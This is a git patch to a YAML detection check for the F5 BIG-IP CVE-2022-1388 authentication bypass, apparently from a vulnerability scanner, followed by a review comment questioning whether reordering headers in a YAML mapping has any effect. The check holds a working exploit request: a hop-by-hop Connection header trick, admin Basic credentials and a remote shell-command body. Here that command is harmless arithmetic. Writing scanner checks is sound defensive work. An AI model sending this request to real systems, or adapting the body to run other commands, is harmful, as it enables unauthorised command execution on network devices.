From 85e636fceaadcf7ac6271eafb91396bdc7b98873 Mon Sep 17 00:00:00 2001
From: jindaxia
Date: Thu, 19 May 2022 17:34:57 +0800
Subject: [PATCH] =?UTF-8?q?fix:=20=E4=BF=AE=E5=A4=8D2022-188=E7=9A=84poc?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

header里面Connection属性keep-alive后面的逗号"," 使得后面的x auth token字段解析出现错误, 从而绕过验证
---
 WebScan/pocs/f5-cve-2022-1388.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/WebScan/pocs/f5-cve-2022-1388.yml b/WebScan/pocs/f5-cve-2022-1388.yml
index a665f82..8eada04 100644
--- a/WebScan/pocs/f5-cve-2022-1388.yml
+++ b/WebScan/pocs/f5-cve-2022-1388.yml
@@ -8,8 +8,8 @@ rules:
 headers:
 Content-Type: application/json
 Connection: keep-alive, x-F5-Auth-Token
- Authorization: Basic YWRtaW46
 X-F5-Auth-Token: a
+ Authorization: Basic YWRtaW46
 body: >-
 {"command":"run","utilCmdArgs":"-c 'expr {{r1}} + {{r2}}'"}
 follow_redirects: false
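Review bot: The only change under `headers:` is the position of `Authorization` relative to `X-F5-Auth-Token`, and a YAML mapping carries no ordering guarantee. If the scanner loads this block into an unordered map, the request it sends may be unchanged, and the check could keep reporting unpatched hosts as clean; the loader is not visible here, so confirm against the emitted request. The commit message discusses the comma in the `Connection` value, which this diff leaves untouched, so the intent should be recorded beside the headers, e.g. `# header order matters for this check; verify the loader preserves it`. The rule's `expression` lies outside the hunk, so the match condition cannot be confirmed from these lines.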